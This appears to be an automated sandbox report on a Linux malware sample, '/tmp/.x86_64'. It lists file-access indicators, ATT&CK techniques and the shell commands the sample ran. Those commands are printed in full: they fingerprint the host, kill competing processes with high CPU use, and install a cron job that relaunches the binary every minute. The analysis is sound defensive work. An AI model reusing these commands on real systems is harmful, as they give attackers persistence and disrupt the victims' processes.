8602c57b152d735fb6e44c5866cd4a837f337d5464641f55e22fd65556e41ee2

execution persistence privilege_escalatio

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.x86_64

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.tFhxv3	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.x86_64

Security Software Discovery 1 TTPs 2 IoCs

Adversaries may attempt to discover installed security software and its configurations.

Security Software Discovery

T1518.001

pid	Process
2553	sh
2530	sh

Checks CPU configuration 1 TTPs 5 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

description	ioc	Process
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	.x86_64
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep

Reads CPU attributes 1 TTPs 7 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	.x86_64
File opened for reading	/sys/devices/system/cpu/types	.x86_64
File opened for reading	/sys/devices/system/cpu/possible	.x86_64
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/fs/cgroup/cgroup.controllers	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	.x86_64
File opened for reading	/sys/bus/node/devices/node0/hugepages	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	.x86_64
File opened for reading	/sys/bus/dax/devices/target_node	.x86_64
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	.x86_64
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	.x86_64
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	.x86_64
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.x86_64
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	.x86_64
File opened for reading	/sys/devices/virtual/dmi/id	.x86_64
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/firmware/dmi/tables/DMI	.x86_64
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	.x86_64
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	.x86_64
File opened for reading	/sys/bus/node/devices/node0/meminfo	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	.x86_64
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	.x86_64
File opened for reading	/sys/bus/dax/target_node	.x86_64
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	.x86_64
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	.x86_64
File opened for reading	/sys/bus/dax/devices	.x86_64
File opened for reading	/sys/bus/node/devices/node0/cpumap	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	.x86_64
File opened for reading	/sys/devices/system/node/online	.x86_64
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages	.x86_64
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.x86_64
File opened for reading	/sys/bus/cpu/devices	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	.x86_64
File opened for reading	/sys/kernel/mm/hugepages	.x86_64
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	.x86_64
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	.x86_64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	.x86_64

Process Discovery 1 TTPs 2 IoCs

Adversaries may try to discover information about running processes.

Process Discovery

T1057

pid	Process
2532	ps
2556	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/141/status	ps
File opened for reading	/proc/2130/ctty	ps
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/51/status	ps
File opened for reading	/proc/65/ctty	ps
File opened for reading	/proc/1946/ctty	ps
File opened for reading	/proc/2028/stat	ps
File opened for reading	/proc/199/cmdline	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/1946/status	ps
File opened for reading	/proc/1936/ctty	ps
File opened for reading	/proc/123/status	ps
File opened for reading	/proc/1990/status	ps
File opened for reading	/proc/42/status	ps
File opened for reading	/proc/199/stat	ps
File opened for reading	/proc/200/ctty	ps
File opened for reading	/proc/1690/status	ps
File opened for reading	/proc/1923/stat	ps
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/51/ctty	ps
File opened for reading	/proc/1780/status	ps
File opened for reading	/proc/3/ctty	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/188/stat	ps
File opened for reading	/proc/2187/environ	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/387/status	ps
File opened for reading	/proc/2132/ctty	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/1943/status	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/386/environ	ps
File opened for reading	/proc/193/cmdline	ps
File opened for reading	/proc/1040/environ	ps
File opened for reading	/proc/1923/cmdline	ps
File opened for reading	/proc/2120/status	ps
File opened for reading	/proc/1680/stat	ps
File opened for reading	/proc/197/status	ps
File opened for reading	/proc/201/status	ps
File opened for reading	/proc/2521/ctty	ps
File opened for reading	/proc/47/ctty	ps
File opened for reading	/proc/2555/stat	ps
File opened for reading	/proc/190/ctty	ps
File opened for reading	/proc/2526/ctty	ps
File opened for reading	/proc/1807/status	ps
File opened for reading	/proc/21/stat	ps
File opened for reading	/proc/28/cmdline	ps
File opened for reading	/proc/2084/ctty	ps
File opened for reading	/proc/2290/status	ps
File opened for reading	/proc/2560/stat	ps
File opened for reading	/proc/2/ctty	ps
File opened for reading	/proc/2171/ctty	ps
File opened for reading	/proc/16/status	ps
File opened for reading	/proc/2257/status	ps
File opened for reading	/proc/31/stat	ps
File opened for reading	/proc/40/stat	ps
File opened for reading	/proc/2477/stat	ps
File opened for reading	/proc/1934/stat	ps
File opened for reading	/proc/1908/cmdline	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/758/ctty	ps
File opened for reading	/proc/197/environ	ps
File opened for reading	/proc/458/status	ps

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.cron	sh
File opened for modification	/tmp/.lock	.x86_64

/tmp/.x86_64
/tmp/.x86_64
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2479
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  PID:2481
- - /usr/bin/hostname
    hostname -I
    3⤵
    PID:2484
- - /usr/bin/awk
    awk "{print \$1}"
    3⤵
    PID:2486
- - /usr/bin/cat
    cat /etc/ssh/sshd_config
    3⤵
    PID:2488
- - /usr/bin/grep
    grep "Port "
    3⤵
    PID:2489
- - /usr/bin/head
    head -n 1
    3⤵
    PID:2490
- - /usr/bin/awk
    awk "{print \"-\"\$2}"
    3⤵
    PID:2491
- - /usr/bin/whoami
    whoami
    3⤵
    PID:2492
- - /usr/bin/hostname
    hostname
    3⤵
    PID:2493
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:2494
- - /usr/bin/grep
    grep -m 1 "model name" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:2497
- - /usr/bin/cut
    cut -d: -f2
    3⤵
    PID:2498
- - /usr/bin/sed
    sed -e "s/^ *//"
    3⤵
    PID:2499
- - /usr/bin/sed
    sed -e "s/\$//"
    3⤵
    PID:2500
- - /usr/bin/awk
    awk "{print \$1}"
    3⤵
    PID:2503
- - /usr/bin/awk
    awk "{print \$4}"
    3⤵
    PID:2506
- - /usr/bin/awk
    awk "{print \$4}"
    3⤵
    PID:2509
- - /usr/bin/awk
    awk "{print \$3}"
    3⤵
    PID:2512
- - /usr/bin/awk
    awk "{print \$4}"
    3⤵
    PID:2515
- - /usr/bin/awk
    awk "{print \$1}"
    3⤵
    PID:2518
- - /usr/bin/awk
    awk "{print \$2\" \"\$3\" \"\$4}"
    3⤵
    PID:2520
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:2521
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2522
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:2523
- - /usr/bin/id
    id -u
    3⤵
    PID:2525
- - /usr/bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2526
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:2527
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2528
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  - Security Software Discovery
  PID:2530
- - /usr/bin/id
    id -u
    3⤵
    PID:2531
- - /usr/bin/ps
    ps aux
    3⤵
    - Checks CPU configuration
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Process Discovery
    - Reads runtime system information
    PID:2532
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2533
- - /usr/bin/grep
    grep -v -- "-bash[[:space:]]*\$"
    3⤵
    PID:2534
- - /usr/bin/grep
    grep -v /usr/sbin/httpd
    3⤵
    PID:2535
- - /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    3⤵
    PID:2536
- /bin/sh
  sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/.x86_64' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.x86_64\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
  2⤵
  - Writes file to tmp directory
  PID:2538
- - /usr/bin/rm
    rm -rf /tmp/.cron
    3⤵
    PID:2540
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:2541
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2542
- - /usr/bin/grep
    grep -v /tmp/.x86_64
    3⤵
    - Reads runtime system information
    PID:2543
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:2545
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2546
- - /usr/bin/grep
    grep "/tmp/.x86_64\$"
    3⤵
    PID:2547
- - /usr/bin/sort
    sort
    3⤵
    PID:2548
- - /usr/bin/uniq
    uniq
    3⤵
    PID:2549
- - /usr/bin/wc
    wc -l
    3⤵
    PID:2550
- - /usr/bin/crontab
    crontab /tmp/.cron
    3⤵
    - Creates/modifies Cron job
    PID:2551
- - /usr/bin/rm
    rm -rf /tmp/.cron
    3⤵
    PID:2552
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
  2⤵
  - Security Software Discovery
  PID:2553
- - /usr/bin/id
    id -u
    3⤵
    PID:2554
- - /usr/bin/ps
    ps aux
    3⤵
    - Checks CPU configuration
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Process Discovery
    - Reads runtime system information
    PID:2556
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2557
- - /usr/bin/grep
    grep -- "-bash[[:space:]]*\$"
    3⤵
    PID:2558
- - /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    3⤵
    PID:2559
- - /usr/bin/wc
    wc -l
    3⤵
    PID:2560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Persistence

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Scheduled Task/Job

T1053

Cron

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

Process Discovery

T1057

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

Virtualization/Sandbox Evasion

T1497

System Checks